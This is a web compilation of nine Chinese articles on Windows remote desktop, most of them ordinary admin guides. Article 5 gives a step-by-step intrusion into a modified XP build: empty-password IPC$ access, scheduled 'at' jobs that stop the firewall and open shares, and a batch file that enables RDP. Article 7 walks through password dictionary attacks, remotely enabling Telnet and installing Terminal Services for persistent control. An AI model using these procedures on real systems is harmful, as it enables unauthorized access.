公务员期刊网 精选范文 远程桌面连接命令范文

远程桌面连接命令精选(九篇)

前言:一篇好文章的诞生,需要你不断地搜集资料、整理思路,本站小编为你收集了丰富的远程桌面连接命令主题范文,仅供参考,欢迎阅读并收藏。

远程桌面连接命令

第1篇:远程桌面连接命令范文

关键词:IPv6;远程桌面;端口

中图分类号:TP393文献标识码:A文章编号:1009-3044(2012)08-1747-02

IPv6是Internet Protocol Version 6的缩写,是IETF设计用于替代现行版本IPv4协议的下一代IP协议。IPv4的网络地址为32位,而IPv6的网络地址为128位。

Windows操作系统下的远程桌面是微软公司为了方便网络管理员管理维护服务器而推出的一项服务,通过远程桌面协议RDP(Remote Desktop Protocol)实现。从Windows 2000 Server版本开始引入,网络管理员使用远程桌面连接程序连接到网络任意一台开启了远程桌面控制功能的计算机上,就好比自己操作该计算机一样,运行程序,维护数据库等。目前很多的管理员都是在Windows XP系统环境下使用远程桌面。

当前远程桌面被广大系统管理员用于相关的远程管理中,主要是在IPv4的网络环境下使用。远程桌面使用的默认端口是3389。

1 Windows下的远程桌面

目前计算机用户主要使用微软操作系统有Windows XP和Windows 7,所以本文主要以这两种系统为特例进行讨论。在IPv4环境下,Windows操作系统使用远程桌面非常的简单,只需要被控端Windows操作系统开启了远程桌面功能和打开3389端口。而在IPv6环境下,由于Windows XP系统的远程桌面连接程序不支持128的IPv6地址,所以在默认情况下不能正常使用远程桌面功能。Windows 7操作系统的远程桌面连接程序则可以支持IPv6地址。

虽然远程桌面使用方便,但是需要满足一定的网络环境,如果被控端的计算机在网路防火墙或NAT的后台,那么远程桌面功能很难实现。原因是网络防火墙一般会拒绝3389端口的服务,而NAT不会把内网中被控计算机的IP地址映射到公网上。如果要满足远程桌面的需求,就需要网络管理员进行特殊设置,但为了网络安全,这种需求往往不能被允许。

由于目前支持IPv6的流控设备和防火墙监控设备应用较少,如果计算机所连接的网络支持IPv6,就可以不用担心网络防火墙对应用层的阻隔。远程桌面可以通过IPv6来实现无障碍连接。

2 IPv6下远程桌面的使用方法

IPv6在国内已经得到了广泛的使用,很多单位或机构直接接入了Cernet2网络。而国内的各大网络运营商也加强了对IPv6的支持。网络运营商通过隧道技术,普通居民使用宽带拨号都可以实现IPv6的应用。而目前IPv6环境下,两台计算机如果都可以得到IPv6地址,就可以突破网络防火墙和NAT的限制,实现应用层的服务。

查看Winsows操作系统IPv6地址的方法是在cmd命令窗口中输入:netsh interface IPv6 show address,会显示出计算机的IPv6地址,如图1所示。

图1 cmd窗口下查看IPv6地址

在Windows XP系统下如果显示IPv6没有安装,则输入netsh interface IPv6 install安装IPv6协议即可。

2.1 Winsows 7远程桌面连接程序对IPV6的连接方法

Windows 7操作系统的远程桌面连接程序支持IPv6,所以打开远程桌面连接程序后,直接在地址栏输入被控端的IPv6地址,连接远程计算机,即可实现远程桌面的应用,如图2所示:

图2 Winsows 7远程桌面连接IPv6地址

或者在cmd命令窗口下输入:mstsc -v:2001:da9:9000:c010::134,其中2001:da9:9000:c010::134为远程受控端计算机的IPv6地址。

2.2 Winsows XP远程桌面连接程序对IPV6的连接方法

由于Windows XP的远程桌面连接程序不支持IPv6,那么广大的Windows XP用户就不能再IPv6环境下直接使用远程桌面了,或者用户不得不把操作系统换成Windows 7。为了解决这个问题,可以采用端口的方法来实现Windows XP下远程桌面应用对IPv6的支持。

2.2.1受控端计算机设置

在受控端IPv6下指定的3389远程桌面连接转发到本机IPv4上,命令为:netsh interface portproxy add v6tov4 3389 127.0.0.1 3389,可以使用netsh interface portproxy show all及netstat -ano | find "3389"命令查看相关信息。如图3所示。

图3 cmd窗口下受控端计算机的设置

2.2.2控制端计算机设置

控制端对本机指定端口的连接(IPv4下)转发为对IPv6远程桌面端口的连接(IPv6下)。例如使用命令:netsh interface portproxy add v4tov6 8888 2001:da9:9000:c010::134 3389。如图4所示:

图4 cmd窗口下控制端计算机的设置

其中8888为远程桌面映射的端口,可以自己随意设置,但设置的端口不能有冲突。2001:da9:9000:c010::134为远程受控端计算机的IPv6地址。使用者可以根据自己的需要修改这两个参数。最后打开远程桌面连接程序,在地址栏输入127.0.0.1:8888连接远程计算机。这样就实现了Windows XP远程桌面对IPv6的支持,如图5所示:

图5

3总结

本文主要讨论了Windows XP/7在IPv6环境下使用远程桌面的方法,由于Windows XP远程桌面连接程序设计的缺陷,不能支持IPv6的地址,文章提出采用端口的方法,在IPv6及IPv4间进行报文转发,从而间接的实现了Windows XP远程桌面在IPv6环境下的连接方法。

参考文献:

[1]冯松.远程桌面连接技术的应用[J].计算机与网络,2009,20.

第2篇:远程桌面连接命令范文

如何知道发生了超限?

一般主机的远程连接数默认设置为3,由于在控制结束后没有采取正确的取消控制方式或者其他原因,很容易造成“超限”情况,出现这种情况时,会弹出图所示窗口提示,确定后就退出了,无法连接。

常规解决方法

当远程电脑连接数已满时,一般的方法就是人工到达远程电脑现场,进行手工操作,终止无效连接进程。这一方法虽然有效,但是太麻烦了,严重影响了远程桌面连接的正常使用。

巧用命令行快速解决超限

通过命令行方式,可以快速解决超限问题,而不用亲自到达现场人工解决(本例中,A、B机均为Windows XP操作系统)。

第1步:在A机中打开命令提示符窗口,执行telnet命令远程登录B机(确保B机的23号端口已开放、无网络防火墙对A机进行拦截)。

第2步:执行“query user”命令(在Windows 2000 Server下,对应命令为“query session”),可以看到远程登录的进程名称。

第3步:执行“log off 进程ID”命令(在Windows 2000 Server下对应命令为“reset session 进程ID”)可以终止登录进程。通过上述命令操作后,远程桌面连接就可以继续使用了。

第3篇:远程桌面连接命令范文

远程桌面连接是一种远程操作计算机的模式,它可以用于可视化访问远程计算机的桌面环境,用于管理员在客户机上对远程计算机服务器进行管理。使用过Net meeting的朋友都会为对其远程桌面共享功能印象颇为深刻,确实,远程共享可以为我们提供很多的方便。由于建立互联需要IP地址的呼叫,服务器也不十分稳定,大多数人恐怕都有过因为找不到一个合适的服务器而苦恼,同时远程桌面连接对双方网络环境要求颇高,加上软件较为繁琐的设置和普及率等原因,这一功能一直是少数人在使用。

在学校日常工作交流中,计算机管理人员常常会用到远程桌面连接功能。其他教师认为这样的功能似乎与自己关系不大,不过在实际使用过程中,教师有时会遇到各种特殊的远程桌面连接需求,要想顺利满足这些特殊的连接需求,就必须要掌握一些常用的远程桌面连接的使用技巧。

案例1:同事的电脑Windows XP系统出错,帮忙重装系统,装好发现常用软件没有,如果跑回办公室拷贝,再安装,要花费很长时间,使用远程桌面连接技术,办公室计算机的桌面瞬间出现在屏幕上,里面的资源一目了然,很轻松就完成了任务。

第一步,为主机添加一个用于远程登录的用户。包括设置用户名和密码,权限属性等(如图1所示)。

第二步,在桌面“我的电脑”上点鼠标右键,选择“属性”;在弹出的系统属性窗口中选择“远程”标签;在标签中找到“远程桌面”,在“启用这台计算机上的远程桌面”前打“√”(如图2所示);再选择“选择远程用户”,在远程桌面用户里点击“添加”,选择“立即查找”,找到用于远程登录的用户后确定即可看到如图3所示界面,其中test是用于远程访问的用户,Administrator是系统默认的用户,但如果此时密码为空,Administrator也不能远程访问。

最后,在客户机上就可以通过点击“开始”“程序”“附件”“远程桌面连接”或“开始”“运行”输入“mstsc”。如图4所示,输入IP地址登录到该计算机,就像操作自己计算机一样方便和迅捷。

当然,有时我们并不仅仅满足于调用文件,也许要解决某些技术上的问题,这时我们可以开启“远程协助”的功能(如图2所示)。远程协助是Windows XP系统附带的一种简单的远程控制的方法。远程协助的发起者通过MSN Messenger向Messenger中的联系人发出协助要求,在获得对方同意后,即可进行远程协助,远程协助中被协助方的计算机将暂时受协助方控制,计算机管理员就可以在被控计算机当中进行系统维护、安装软件、处理计算机中的某些问题,或者向被协助者演示某些操作。

使用远程协助时,可在MSN Messenger的主对话框中单击“操作寻求远程协助”菜单命令。然后在出现的“寻求远程协助”对话框中选择要邀请的联系人。当邀请接受后,打开“远程协助”程序对话框。被邀人单击“远程协助”对话框中的“接管控制权”按钮就可以操纵邀请人的计算机了。

案例2:学校每天的课间操,因为学生整队入场等时间是不确定的,需要手动来控制音乐广播,计算机管理员不可能每次奔波于办公室和广播室,这时我们可以通过网络,利用PcAnywhere软件来实现。

PcAnywhere是赛门铁克公司设计的远程控制软件,安装比较简单,运行setup.exe后一路回车即可。运行PcAnywhere后在主界面中设置被控端和主控端,通过主控端连接到被控端要输入被控端所设置的身份验证。

在PcAnywhere管理器窗口中,单击主控端,选择添加“主控端”,在新主控端中对连接的属性加以设置。

连接信息:主控端和被控端的设置相同。

设置:这里用来设置使用的连接方式和登录信息。如果使用局域网或者互联网建立连接,需要指定被控端IP地址,同时需要设置自己的登录信息,如账号、密码、登录的域等(如图5所示)。

呼叫者:这里用来设置被控端中呼叫者的账号、密码等信息,操作与设置主控端的登录信息相同。

自动化任务:设置自动文件传输等自动化任务。

安全选项:设置远程控制过程中所使用的数据加密级别。

保护项:可以设置安全保护的密码。

在主控端会比被控端多一个连接项“File Transfer”。打开它就会打开PcAnywhere文件管理器,你可以远程控制被控端计算机中的文件资源,可以执行创建、删除、重命名、复制等一列操作,还可以将被控端计算机中的文件和本机中的文件夹相比较,使得两台不同计算机中的文件保持同步,利用这个管理器,还可以进行主控端和被控端计算机的文件相互传输。

用PcAnywhere控制学校的服务器,免去了上下奔波的麻烦,省时省力,轻松管理学校的整个计算机网络,如果有公网IP,在防火墙上做一个IP映射,那么在任何时候、任何地方,只要连接到互联网,就可以远程控制服务器了。

案例3:学校有一位教师不小心删除了重要的文件资料,并且把“回收站”也清空了,一下子不知道怎么办,这位教师向计算机管理员求教,计算机管理员通过QQ远程协助,顺利地用恢复工具将误删除的资料恢复过来。

腾讯的QQ除了具备网络聊天的功能外,还新开发了许多方便实用的功能,QQ的远程协助就是其中一项,下面我们就来看看如何使用这个功能,让远程协助变得更轻松。

(1)“远程协助”功能

要与QQ好友使用远程协助,那么首先打开与好友聊天的对话框,然后点击右图中的“应用”图标,就能找到“远程协助”选项了。

(2)“远程协助”的申请

QQ的“远程协助”功能,必须由需要帮助的一方点击“远程协助”选项进行申请,提交申请之后,就会在对方的聊天窗口出现提示。

接下来接受请求方当然是点击“接受”了,这还不够,QQ比较小心,又会在申请的一方的对话框出现一个对方已同意你的远程协助请求,“接受”或“谢绝”的提示,只有申请方点击“接受”之后,远程协助申请才正式完成。

当成功建立连接后,协助方就会出现要帮助方的桌面了,并且是实时刷新的,右边的窗口就是申请方的桌面了,这时协助方的每一步动作都尽收眼底。

(3)“远程协助”的开启

要想控制对方电脑进行远程协助,还得由申请方点击“申请控制”,才能开启“远程协助”功能,在双方又再次点击接受之后,才能开始控制对方的电脑。

第4篇:远程桌面连接命令范文

1.更改组策略――截取UAC图片

默认情况下在当前系统弹出UAC拦截窗口时,系统默认会提升桌面安全性,导致无法运行其他截图程序,此时可以通过修改组策略的方法绕开这个限制。

在搜索框输入“qpedit.msc”启动组策略编辑器,依次展开“计算机配置一WindOWS设置安全设置本地策略安全选项”,在右侧窗口双击打开“用户账户控制:提示提升时切换到安全桌面”,将其设置为“已禁用”(图1)。

禁用上述策略后现在再打开类似注册表编辑器、管理员身份运行命令提示符这些组件,系统弹出用户账户控制窗口,此时只要按下AIt+P rintScreen键就可以成功进行截图了(图2)。不过要注意的是,系统默认设置可以有效阻止恶意程序运行,建议完成截图后再次恢复组策略默认设置。

2.巧用远程桌面截取用户登录界面

默认情况下如果注销当前用户,系统所有程序都会自动关闭,因此常规的方法很难截取用户登录界面图。WindOWS10的远程桌面可以在当前桌面环境下登录远程电脑,因此使用该组件就可以截取到用户的登录界面。

首先在局域网内任意一台WindOWS10电脑设置窗口输入“远程桌面”,打开系统属性窗口后切换到“远程”,单选远程桌面选项下的“允许远程连接到此计算机”,单击“选择用户”,设置一个利用远程连接的用户,并记住其登录密码和当前电脑的内网IP地址(图3)。

接着在需要截图的WindOWS 10电脑上开启远程桌面连接组件,按提示输入远程连接电脑的IP,成功连接后在当前电脑桌面看到远程用户的登录界面,此时再按下AIf+PrintScreenSysRq键就可以成功进行截图了。用同样的方法可以对用户注销、锁定等界面进行截图(图4)。

3.巧用虚拟机截取各种启动、安装截图

对于电脑的启动界面(如WindOWS10多重启动菜单),系统安装界面图片,由于此时电脑程序都未启动,常规的方法也无法进行截图。不过WindOWS10已经自带虚拟机组件,因此只要在WindOWS10中安装特定的系统虚拟机即可实现截图。

打开控制面板,依次展开“程序一启动或关闭WindOWS功能”,然后在WindOWS功能下面我们找到并勾选Hvper-V,点击“确定”后按提示安装虚拟机组件(图5)。

重启电脑之后在所有应用中启动“Hyper-V管理工具”,按提示安装需要截图的虚拟系统,这样在WindOWS10中启动相应的虚拟系统后就可以进行截图了,比如可以直接截取系统安装界面等(图6)。用活画图自制特殊界面截图

4.使用虚拟机的方法几乎可以截取各种特殊格式的截图,不过虚拟机的安装需要花费大量的时间,如果只是截取某一个简单的界面如BlOS设置,我们还可以使用WindOWS10自带的画图组件来手动制作。比如UEFI启动界面,通过相机的拍摄可以看到,这基本上是一张蓝底白字的字符界面,我们只要在画图中设置相应的颜色和对应的文字即可(D7)。

首先使用相机将启动界面拍摄出来,导入画图后在原图的右侧增加适当大小的空白区域,然后使用蓝底填充底色,并根据原拍摄图片加上对应的框格,最后使用画图的文字填充工具(高亮颜色使用画图的去色和矩形工具进行填充),将文字的颜色设置为白色,按提示将相应的文字填写上去即可(图8)。

第5篇:远程桌面连接命令范文

Windows系列的操作系统都提供共享服务,这些共享服务的主要通道就是IPC。IPC是Internet ProcessConnection的简称,也称共享命名管道,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。这种入侵方式在Windows 2000普及的年代非常流行。

默认情况下Windows系列的操作系统都支持空连接,空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。利用ipc$,连接者可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而XP系统限制了空连接导出用户列表的功能,提高了安全性。

默认共享是系统安装完毕后就自动开启的共享,也叫管理共享,常被管理员用于远程管理计算机。在Windows2000/XP及其以上版本中。默认开启的共享有“c$”、“d$”、“admin$”、“ipc$”等,我们可以在“运行”对话框中输入“\\计算机名\盘符$”对这些资源进行访问,以上这些共享就叫做默认共享。默认共享是只面向管理员组用户开启的共享,也就是说只有管理员组的用户才能访问这些共享,非管理员组用户(即使是超级用户)不能进行访问。如果我们在对话框中输入的不是管理员组用户而是其他用户组的账户和密码(如guest组、backup operators组、power users组等),系统是不会让我们访问该共享资源的。另外密码不能为空,否则也连不上XP的默认共享。

通常是无法利用IPC入侵原版XP的,最主要的原因是XP与2000在来访者的权限设置上是不同的,在XP中即使有管理员权限的用户和密码也不一定能建立联接或复制文件。

身份验证:XP默认是把从网络登录的所有用户都按来宾账户处理的,因此即使管理员从网络登录也只具有来宾的权限,在XP的(secpol.msc)本地安全设置/本地策略/安全选项中:

网络访问:本地帐户的共享和安全模式,有两个选项:

经典_本地用户以自己的身份验证

仅来宾_本地用户以来宾身份验证

当番茄花园系统安装完成后,所有的盘符默认共享自动关闭,远程桌面关闭,Remote Registry服务关闭,系统只开了IPC$通信命名管道,administrator密码为空,如果安全选项和空口令设置和原版相同,则系统也将是安全的,然而问题出来了,点开始/运行输入secpol.msc,展开本地安全设置/本地策略/安全选项中的“网络访问:本地帐户的共享和安全模式”,可以发现被改为“经典”。

空口令限制:在XP的注册表中有一项limitblank.passworduse,它是用来限制空口令连接的

[HKEY_LOcAL_MAcHINE\SYSTEM\ControlSet001\Control\LsaJ]

“limitblankpassworduse”=dword:00000001

很明显看出来,通过导人注册表来修改安全设置。

O:代表空密码有效。1:代表空密码无效。

系统默认是1,可以有效防止黑客人侵。

而在番茄花园系统中,点开始/运行输入Regedit,展开[HKEY_LoCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa]发现limitblankpassworduse被改为O。这就意味着,黑客利用了XP管理员的弱口令。

入侵番茄花园版XP,需要针对XP系统的特点,开启和关闭一些服务(假设目标IP是192.168.1.5)。

1)net use\\192.168.1.5\IPC$" "/user:"admintitrators"。

看到“命令成功完成”提示,连接成功1

2)net time\\192.168.1.5

查查时间,发现192.168.1.5的当前时间是2007/5/6下午5:12,出现“命令成功完成”提示。

3)at\\192.168.1.5 17:14 net stop“Window$Firewall/Internet connection Sharing(ICS)”

用at命令启动net stop关闭对方计算机中的Windows Firewall/Intemet Connection sharing(ICS)服务以利于关闭Windows防火墙。

4)执行at\\192.168.1.5检查任务是否安排。

5)再次执行net time\\192.168.1.5获得远程机器时间。

发现192.168.1.5的当前时间是2007/5/6下午5:29,出现“命令成功完成”提示。

6)执行at 17:30\\192.168.1.5 net share diskc=c:

开启192.168.1.5的C盘共享。

7)打开我的电脑,输入\\192.168.1.5\diskc,新建一个文本文件,输入以下内容

echo Windows Registry Editor Version 5.00>>3389.reg

echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control\Terminal server]>>3389.reg

echo"fDenyTSConnections"=dword:00000000>>3389.reg

echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcP]>>3389.reg

echo"PortNumber"=dword:00000d3d>>3389.reg

echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcpl>>3389.reg

echo"PortNumber"=dword:00000d3d>>3389.reg

regedit/s 3389.reg

del 3389.reg

将文件保存为3389.bat。

8)再次执行net time\\192.168.1.5获得远程机器时间,发现192.168.1.5的当前时间是2007/5/6下午6:29,出现“命令成功完成”提示。

9)执行at 18:30\\192.168.1.5c:\3389.bat。

10)点“开始/所有程序/附件/通讯”,运行“远程桌面连接”,输入192.168.1.5即可远程操作计算机了。

知道漏洞产生的原因后,修补起来也是相当的简单,关键是修改注册表中的limitblankpassworduse和forceguest的键值,将下面的内容保存为fix.reg,双击fix.reg,提示是否导入注册表,点确认后即可修补漏洞。

第6篇:远程桌面连接命令范文

大家知道通过BIOS设置,电脑在电源待机的情况下我们可以通过键盘、鼠标实现开机。同样的,现在很多电脑也支持网卡唤醒,即远程唤醒Wake On LAN(WOL),现在大部分网卡都支持这个功能。Windows 10用户只要打开“控制面板网络和Internet网络连接”,然后双击打开“以太网”,在打开的窗口切换到“属性网络配置”,在打开的属性窗口看是否有类似“Wake on Magic Packet”(通过魔术包唤醒)选项,如果有并将其值设置为“Enabled”即可支持远程唤醒(图1)。

那么MagicPacket(魔术包)是什么?其实这是一种包含有连续6个字节的“FF”和连续重复16次的MAC地址数据包。对于支持“Wake on Magic Packet”的网卡,如果它能够接收到包含"FFFFFFFFFFFF"+连续重复16次的MAC地址的数据包,那么网卡就会自动唤醒电脑(类似鼠标开机,BIOS检测到鼠标移动讯息后会唤醒电脑)。MagicPacket可以在其他远程电脑借助Magic Packet Utility、WakeOnLanGui等软件发出,接收端则可以通过路由器实现,这样在路由器通过转发端口映射到指定电脑,假设为机器A,这样机器A的网卡收到MagicPacket数据包后就会唤醒电脑,这就是网卡远程开机的原理(图2)。

如上所述,被控开机电脑假设为机器A要实现远程开机,关键是其网卡要能够接收到远端电脑发出的包含"FFFFFFFFFFFF"+连续重复16次的MAC地址的数据包,因此需要在机器A上做如下设置。

其次远程唤醒还需要主板支持,首先需要查看主板是否支持Wake-up OnLAN(WOL)技术,根据自己的主板说明进入BIOS设置,查看是否有类似“Wake Up On LAN”的选项,将其值设置为“Enabled”,按F10保存退出(图3)。

最后将本机内网IP设置为固定地址,进入网卡属性设置窗口后,选择“使用下面的IP地址”,按照自己的实际网络环境设置好IP地址、子网掩码、网关、DNS地址等信息(图4)。

确保自己的网卡和主板支持远程唤醒后,接下来就要设置电脑网卡接收魔术包等信息。因为现在大部人的电脑都是处在路由器下的局域网内,因此要让机器A的网卡能准确接收到魔术包,还需要在路由器进行如下设置(这里以TP-Link路由器为例)。

1 建立端口映射

展开左侧面板的“转发规则虚拟服务器”,点击“添加新条目”,在打开的窗口添加一个新条目,服务器端口为77(可以任意设置,但是不要和其他默认端口重复),内部端口号留空,IP地址为上述设置的固定IP地址,协议为UDP,并使之处于“生效”状态。这样路由器收到魔术包后会转发到192.168.1.115这台电脑上,从而激活网卡远程唤醒功能(图5)。

2 设置静态IP

同上展开右侧面板“DHCP服务器静态地址保留”,点击增加新条目,MAC地址输入本地网卡的地址,IP地址输入上述设置的固定IP地址信息,状态为“生效”,这样在电脑启动后确保可以获得192.168.1.115(图6)。

3 启动DNS功能

因为很多家用宽带都是动态IP地址,这样在其他电脑上向被控电脑发送魔术包时会带来不便,可以使用一个动态域名服务,确保可以通过动态域名访问路由器。切换到“动态DNS”,然后注册一个花生壳动态域名服务即可。

完成上述的设置后,现在就可以在单位电脑使用“WakeOnLanGui”来进行魔术包的发送。启动软件后按提示输入下列信息,点击“唤醒”即可(图7):

MAC地址:填写远程网络唤醒的网卡MAC(具体地址信息可以通过在命令提示符输入“ipconfig /all”获得)

W址(IP):填写从花生壳获取的动态域名(可以直接填入本机外网IP地址,因为本机外网IP只有重启后才会变动,因此没有动态域名的用户可以直接进入路由器中查看,记住后路由器没有重启就可以一直使用)

子网掩码:如果是通过互联网(公网/外网)唤醒,填写255.255.255.255

发送选项:广域网

第7篇:远程桌面连接命令范文

[关键词]密码字典 Telnet 终端服务

一、引言

随着网络上计算机的使用量的不断增加,越来越多的计算机用户对如何成为黑客感兴趣。由于现在许多的用户使用的操作系统为Windows操作系统,于是造成越来越多的黑客攻击Windows操作系统,这就给广大的用户提供了一个交流的平台,本文旨在通过一个完整的案例来说明如何远程登录到网络上的某台计算机,实现远程控制及远程管理。本案例使用的工具软件在Internet上都可以下载到,并且无需了解很多专业方面的知识就可以实现。当然,如果目标计算机上采取了一些安全措施,如安装了一些专业的防火墙或杀毒软件,则文中的大多数入侵工具则无用武之地了,因为网络当中的攻防技术都是相对来说的。整个过程分别按照如下步骤进行。

二、系统用户扫描

可以使用工具软件:GetNTUser,该工具可以在WIN NT4以及WIN 2000操作系统上使用,例如对IP为172.18.25.109的计算机进行扫描,首先将该计算机添加到扫描列表中,选择菜单File下的菜单项“添加主机”,输入目标计算机的IP地址。单击工具栏上的图标,可以得到对方的用户列表。利用该工具可以对计算机上用户进行密码破解,首先设置密码字典,设置完密码字典以后,将会用密码字典里的每一个密码对目标用户进行测试,如果用户的密码在密码字典中就可以破解出该密码。选择菜单栏工具下的菜单项“设置”,设置密码字典为一个文本文件。利用密码字典中的密码进行系统破解,选择菜单栏工具下的菜单项“字典测试”,程序将按照字典的设置进行逐一的匹配。这样我们就破解出了目标计算机的管理员用户的密码。

三、远程启动Telnet服务

利用主机上的Telnet服务,有管理员密码就可以登录到对方的命令行,进而操作对方的文件系统。如果Telnet服务是关闭的,就不能登录了。默认情况下,Windows 2000 Server的Telnet是关闭的。利用工具RTCS.vbe可以远程开启对方的Telnet服务,使用该工具需要知道对方具有管理员权限的用户名和密码。

命令的语法是:“cscript RTCS.vbe 172.18.25.109 administrator 123456 1 23”,

(1)其中cscript是操作系统自带的命令

(2)RTCS.vbe是该工具软件脚本文件

(3)IP地址是要启动Telnet的主机地址

(4)administrator是用户名

(5)123456是密码

(6)1是登录系统的验证方式

(7)23是Telnet开放的端口

执行完成后,对方的Telnet服务就被开启了。在DOS提示符下,登录目标主机的Telnet服务,首先输入命令“Telnet 172.18.25.109”,因为Telnet的用户名和密码是明文传递的,首先出现确认发送信息对话框。输入字符“y”,进入Telnet的登录界面,需要输入主机的用户名和密码。如果用户名和密码没有错误,将进入对方主机的命令行。

四、在对方的命令行下开启对方的终端服务

大家此时会发现,使用命令行的方式操纵别人的计算机很不方便,有没有更好的方式来对远程的计算机进行操作呢?有,那就是可以登录到别人的计算机桌面来实现图形化的操作。终端服务是Windows操作系统自带的,可以远程通过图形界面操纵计算机。在默认的情况下终端服务的端口号是3389。可以在系统服务中查看终端服务是否启动。假设对方不仅没有开启终端服务,而且没有安装终端服务所需要的软件。使用工具软件djxyxs.exe,可以给对方安装并开启该服务。在该工具软件中已经包含了安装终端服务所需要的所有文件。将该文件上传并拷贝到对方计算机的Winnt\\temp目录下。由于我们前面已经登录到对方的命令行界面,故此我们只需使用copy命令将本机上的djxyxs.exe文件拷贝到对方的Winnt\\temp目录下便可。然后执行djxyxs.exe文件,该文件会自动进行解压,将文件全部放置到当前的目录下,执行命令查看当前目录下的文件列表。此时会发现生成了一个目录I386,该目录下放置了安装终端服务所需要的文件。最后执行当前目录下解压出来的azzd.exe文件,将自动在对方的计算机上安装并启动终端服务。安装完毕后,对方的服务器会自动重启,之后就可以使用终端服务连接软件登录对方的计算机了。

五、连接到对方的终端服务

利用Windows 2000自带的终端服务工具:mstsc.exe。该工具可以在操作系统的安装光盘中找到,将该工具放到自己的C:\\WINNT\\SYSTEM32中,接下来在“开始―运行”中输入“mstsc.exe”便出现“终端服务客户端”界面,在该界面中只要设置要连接主机的IP地址和连接桌面的分辨率就可以。如果目标主机的终端服务是启动的,可以直接登录到对方的桌面,在登录框输入用户名和密码就可以在图形化界面操纵对方主机了。至此一个完整的网络入侵过程便实现了。并可以非常简单的操作对方的计算机从而实现对目标计算机的长久控制。

六、结语

综上步骤,我们可以很轻松的入侵没有采取防范措施的计算机,轻松的登录对方的命令行或远程桌面系统,当然也可以实现对远程目标主机的管理与故障维护,大大的提高了我们的工作效率。

参考文献:

[1]杨义先.网络安全理论与技术.人民邮电出版社,2003.

第8篇:远程桌面连接命令范文

关键词:雷达;回波;通讯

1 引言

3830A雷达为全相参体制的脉冲多普勒天气雷达,是通过发射高功率的微波脉冲信号,借助于云、雨等气象目标的后向散射来检测、分析和确定降水目标信息的。佳木斯市气象局新一代天气雷达系统出现主微机回波强度变大,串口数据、接收模式消失,频率和重复频率自动改动的现象,下面就此现象处理做简要分析。

2 现象描述

2010年5月29日 18:50监控微机正常,主微机速度回波不正常,接收模式显示为空,频率为5310MHz,接受模式改为正常,标定曲线后恢复正常; 2010年7月14日 22:00―23:00监控微机正常,主微机强度回波异常,重频异常,接收模式设为正常,重频设为900:600Hz后,恢复正常;8月21日8:49 监控微机正常,主微机强度回波异常,强度明显比监控微机强度大,信号处理显示“复位状态”,接受模式为空,频率5990MHz,接收;模式设为正常后,恢复正常。

3 工作流程

3830A雷达光纤通信系统的检查和调整主要针对光端机插件板、复分接插件板和电话电路插件板进行。此外,尚有两块稳压电源需检查。

如图中本地复接电路将三部分电信号复接为一路串行数据码流,送往光端机。

三部分电信号是:(1)信号处理器输出的原始探测数据,包括回波强度、回波速度和谱宽数据;(2)监控分系统采集到的发射、接收、伺服、信号处理等分系统的工作状态和故障信息;(3)局端电话板送出的三路电话(雷达主机室内、天线转台内和市话)的话音信息。本地分接电路则接收远端光端机经光纤传来的控制命令和电话话音信息,进行分接处后,再按信号种类分别送往监控分系统和局端电话板。

本地光端机将本地复接电路送来的串行数据码流(电信号)转换为光信号送往光缆终端盒;将远端传来的光信号转换为电信号送往本地分接电路。

远端光端机将接收到的光信号转换为电信号,送往远端分接电路,再按信号种类分别送往主微机、监控微机和远端电话板。主微机和监控微机产生的操作控制和参数设置命令、远端电话板产生的电话话音信号在远端复接电路中复接为串行数据码流,然后送远端光端机转换为光信号,经远端终端盒、光纤向雷达主机室传送。

4 故障判断及分析

雷达主微机出现强度回波变大,串口数据:接收模式消失,频率和重复频率自动改动的现象,经重新设置接受模式后可恢复正常,而监控微机没有此现象。雷达主机室的光端机将复接电路送来的电信号转换为光信号送往终端机房的光端机,终端机房光端机将收到的光信号转换为电信号送往终端机房的分接电路,分接给监控微机和主微机。而只有主微机因传输信号的异常受到影响,监控微机接收到的信号是正常的,可以判断雷达机房的的信号传输正常,有以下几种原因:(1)终端机房的复分接或光端机部分信号传输异常,导致信号传输错误,致使主微机接收模式、频率、重复频率等设置自动更改,强度回波、速度回波异常。更换终端机房的复分接板或光端机插件板。(2)数据采集卡的原因,更换数据采集卡如再出现此类现象表明位数据采集卡问题,需更换数据采集卡。

5 故障的处理

由于复分解和光端机是较早的通讯设备,厂家已经不生产,现有的备件已经不能满足需求,所以我局向上级申请更换网络版的通讯系统。在更换之前,做如下处理:将机房内连接光端机的串口直接连接到监控微机的数据采集卡上,跳过光端机和复分接板,直接采集数据。监控微机上安装自动开机软件,并开启远程桌面,在终端机房的主控微机上也安装自动开机重启软件,并通过远程桌面连接到主控微机,进行操作。同时,在雷达软件上,设置成网络分发模式进行分发数据。这样就抛开原有的复分解光端机模式的光纤通信系统。这种传输方法比较稳定,但单路的传输一旦出现故障,就只能更换备份计算机。现已更换了网络版光纤通讯系统。

6 总结

天气雷达系统出现主微机回波强度变大,串口数据:接收模式消失,频率和重复频率自动改动的现象,主要是信号传输出错产生的,最后判断为终端机房部分的信号传输部件原因。由于此现象是不定时出现,处理过后仍需继续细心观察,日常维护和巡视就尤其重要。

参考文献:

[1]新一代天气雷达(CINRAD/CC)技术说明书[K].安徽四创电子股份有限公司,2012(03).

第9篇:远程桌面连接命令范文

关键字:云桌面;KVM;SPICE

中图分类号: TP311.5 文献标识码:A 文章编号:1672-3791(2016)10(c)-0000-00

1 引言

随着2015年国家“互联网+”行动计划的逐步实施,移动互联网、云计算和大数据等新技术的不断推进,很多传统的信息框架和观念被淘汰或更新,国家信息化和现代化的发展日新月异。但是长期以来一些信息化基础设施的建设却比较落后,尤其是传统桌面终端的管理存在安全性差,设备不稳定,维护成本较高等问题,这些问题不仅限制了人们的使用,也阻碍了信息化的发展。而以RDP、VNC和SPICE等技术为基础的虚拟云桌面的发展将操作系统和应用数据集中于数据中心统一管理,这种系统运行方式的变革提升了数据的安全和用户的体验,有效的解决了传统构架带来的复杂管理和高耗能等问题,是未来桌面终端应用发展的趋势。

2 SPICE

2.1 协议简介

